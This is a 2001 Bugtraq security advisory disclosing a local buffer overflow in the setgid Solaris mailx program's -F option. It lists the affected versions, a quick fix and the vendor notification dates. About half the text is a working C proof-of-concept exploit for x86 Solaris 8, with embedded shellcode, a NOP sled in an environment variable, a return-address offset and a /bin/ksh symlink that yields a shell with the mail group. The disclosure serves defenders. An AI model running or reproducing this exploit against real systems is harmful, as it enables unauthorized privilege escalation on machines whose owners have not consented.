[20535] in bugtraq
Solaris mailx Vulnerability
daemon@ATHENA.MIT.EDU (Pablo Sor)
Wed May 2 22:40:09 2001
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <3AF03635.5533E1FB@afip.gov.ar>
Date: Wed, 2 May 2001 12:30:45 -0400
Reply-To: Pablo Sor <psor@AFIP.GOV.AR>
From: Pablo Sor <psor@AFIP.GOV.AR>
To: BUGTRAQ@SECURITYFOCUS.COM
Vulnerability in Solaris mailx(1)
Date Published: April 11, 2001
Advisory ID: N/A
Bugtraq ID: N/A
CVE CAN: Non currently assigned.
Title: Solaris mailx(1) Buffer Overflow Vulnerability
Class: Boundary Error Condition
Remotely Exploitable: No
Locally Exploitable: Yes
Vulnerability Description:
The mailx program is installed setgid mail by default in Solaris,
a buffer overrun exists in the -F option, by specifying a long buffer
containing machine executable code, it is possible to execute
arbitrary command as gid mail.
Vulnerable Packages/Systems:
Solaris 8 SPARC
Solaris 8 x86
Solaris 7 SPARC
Solaris 7 x86
Solaris 2.6 SPARC
Solaris 2.6 x86
Solaris 2.5.1 SPARC
Solaris 2.5.1 x86
Solaris 2.5 SPARC
Solaris 2.5 x86
Quick Fix:
Clear the sgid bit of /usr/bin/mailx program.
Solution/Vendor :
Sun Microsystems was notified on April 18, 2001. Patches are excepted shortly.
Vendor notified on: April 18, 2001
Credits:
This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.
This advisory was drafted with the help of the SecurityFocus.com Vulnerability
Help Team. For more information or assistance drafting advisories please mail
vulnhelp@securityfocus.com.
Technical Description - Exploit/Concept Code:
#include <fcntl.h>
/*
/usr/bin/mailx overflow proof of conecpt.
Pablo Sor, Buenos Aires, Argentina 04/2001
psor@afip.gov.ar, psor@ccc.uba.ar
works against x86 solaris 8
default offset should work.
usage:
bash$ id
uid=100(laika) gid=1(other)
bash$ ./mailx-exp
Subject: tomy
.
EOT
[wait...]
$ id
uid=100(laika) gid=1(other) egid=6(mail)
*/
long get_esp() { __asm__("movl %esp,%eax"); }
int main(int ac, char **av)
{
char shell[]=
"\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"
"\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"
"\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"
"\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"
"\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"
"\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"
"\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"
"\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"
"\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"
"\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78";
unsigned long magic = get_esp() + 2075; /* default offset */
unsigned char buf[1150];
char *envi;
envi = (char *)malloc(300*sizeof(char));
memset(envi,0x90,300);
memcpy(envi+280-strlen(shell),shell,strlen(shell));
memcpy(envi,"SOR=",4);
envi[299]=0;
putenv(envi);
symlink("/bin/ksh","/tmp/xx");
memset(buf,0x41,1150);
memcpy(buf+1116,&magic,4);
buf[1149]=0;
execl("/usr/bin/mailx","mailx","-F",buf,NULL);
}
--
Pablo Sor
psor@afip.gov.ar, psor@ccc.uba.ar
